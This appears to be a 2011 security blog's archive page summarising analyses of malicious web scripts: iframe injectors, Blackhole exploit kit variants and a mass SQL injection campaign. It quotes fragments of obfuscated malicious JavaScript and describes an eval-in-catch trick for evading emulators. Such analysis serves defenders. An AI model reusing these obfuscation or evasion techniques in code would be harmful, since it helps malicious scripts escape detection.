coordinator's planet

A leaf is a wing that cannot fly

A wing is a leaf that has landed in the sky

Archive: October 2011
Interesting malicious script #4
Summary: The latest iframeinject.P, which uses document.body.appendChild instead of eval. <!--Injection_head[SessionId=4E768C5B,version=2.0,type=Infect,CRC32=3CEB8EB8]--><!--Injection_tail[SessionId=4E768C5B]--><!--Injection_head[SessionId=215F71E2,version=2.0,type=FindDomainName,CRC32=1B78FB82 [Read more]
posted @ 2011-10-28 03:18 coordinator Views (52) | Comments (0)
Interesting malicious script #3
Summary: This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen versions in a month or two. I've replaced the payload in <span></span> as it is very large. Eval itself is turned into a string and I [Read more]
posted @ 2011-10-28 03:16 coordinator Views (65) | Comments (0)
Interesting malicious script #2
Summary: This script has eval exposed, but simply replacing eval with alert won't show the malicious payload. In fact, only m[i] will be shown in the popup dialog. And the eval is executed in the catch block, which should be able to defeat a lot of emulators, as emulators usually disable exception for per [Read more]
posted @ 2011-10-26 12:37 coordinator Views (12) | Comments (0)
Interesting malicious script #1
Summary: var CJlKp; function AyzhzK(){} var KCfW; var xBtS; var HEKIZIOW=""; if('EXHJH'=='vaEYij')LWkpgS(); if('CLfChe'=='QiJCNa')uYVR='YcOyK'; var UjFXc="sl\x69\x63e"; var kBzvW='FUQEEH'; if('hyIN'=='Sjacj')YNTWV='MgnooX'; var AFXFJ [Read more]
posted @ 2011-10-26 12:31 coordinator Views (66) | Comments (0)
About the newest Mass SQL Injection
Summary: http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.html After searching on Google and Bing, I found this mass-sql-injection attacked 134,000 sites in Google's results and 22,500 sites in Bing's results. Safebrowsing only blocked a minority of them. And the numb [Read more]
posted @ 2011-10-22 07:27 coordinator Views (11) | Comments (0)